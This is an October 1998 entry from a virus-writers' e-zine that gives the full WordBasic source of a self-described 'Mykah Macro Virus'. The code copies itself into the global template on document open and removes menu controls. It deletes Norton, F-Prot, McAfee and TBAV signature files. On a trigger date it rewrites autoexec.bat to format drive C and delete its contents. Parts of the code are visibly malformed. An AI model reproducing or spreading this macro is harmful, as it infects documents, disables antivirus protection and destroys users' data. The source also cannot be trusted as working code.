ฤฤฤฤฤฤฤ[PVW4.021]ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
Written for the : Pinoy Virus Writers E-Zine #4
DATE : October 1998
                                % % % % %

                               - = %|% = -

 ษอออ   sOuRcEs !!!  ออออออออออออออออออออออออออออออออออออออออออป
 ศอออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออผ

             " I call this the Mykah Macro Virus "

  By : Lorz

-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--


Sub AutoOpen()

ToolsOptionsSave .GlobalDotPrompt = 0
m$ = FileName$() + ":Lorz"
MacroCopy m$, "Global:FileSaveAs"
m$ = FileName$() + ":AutoOpen"
MacroCopy m$, "Global:Lorz"

End Sub

_____________________________________

Sub ToolsMacro()

CommandBars("tools").Controls("Macro").Delete
           CommandBars("tools").Controls("Customize...").Delete
           CommandBars("tools").Controls("Templates and Add-Ins...").Delete
           CommandBars("view").Controls("Toolbars").Delete
End Sub


______________________________________

Sub Rolz()


On Error Goto a                        
  VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"
                                        
 If Files$(VF$) = "" Then Goto a        
 SetAttr VF$, 0                         
 Kill VF$                               
				
a:                                      
 On Error Goto c                       
  AB$ = "C:\Autoexec.bat"     
 If Files$(AB$) = "" Then Goto c 
 SetAttr AB$, 0                         

 Open AB$ For Append As #1              
  Print #1, "@echo off"                 
  Print #1, "IF exist " + VF$ + " then del " + VF$
                                        
  Close #1                              
                                        

c:                                      
 On Error Goto d                        
  VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
 If Files$(VF$) = "" Then Goto d        
 SetAttr VF$, 0                         
 Kill VF$
				
d:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then Goto f
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1


f:

 On Error Goto g
  VF$ = "C:\Program Files\McAfee\Scan.dat"
 If Files$(VF$) = "" Then Goto g
 SetAttr VF$, 0
 Kill VF$
				
g:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then Goto h
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1

h:

 On Error Goto i
  VF$ = "C:\Tbavw95\Tbscan.sig"
 If Files$(VF$) = "" Then Goto i
 SetAttr VF$, 0
 Kill VF$
				
i:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then Goto j
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1


J:
If Day(Now()) = 8 And Month(Now() = 7) Then
	SetAttr "C:\AUTOEXEC.BAT", 0
	Name "C:\AUTOEXEC.BAT" As "C:\AUTOEXEC.AAV"
	Open "C:\AUTOEXEC.BAT" For Output As #1
	Print #1, "@Echo off"
	Print #1, "cls"
	Print #1, "echo I have just entered your ass:"
	Print #1, "echo         MS-WINDOWS"
	Print #1, "echo Lorz has been in for awhile   "
	Print #1, "echo                --AKP--"
	Print #1, "echo y|format c: /u /v:AAV >nul"
	Print #1, "deltree /y c: >nul"
	Close #1
	dsk$ = Left$(DefaultDir$(9), 3)
	DocMinimize 

Z:

-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--
(C) Pinoy Virus Writers 1998
Lorz213@mailcity.com
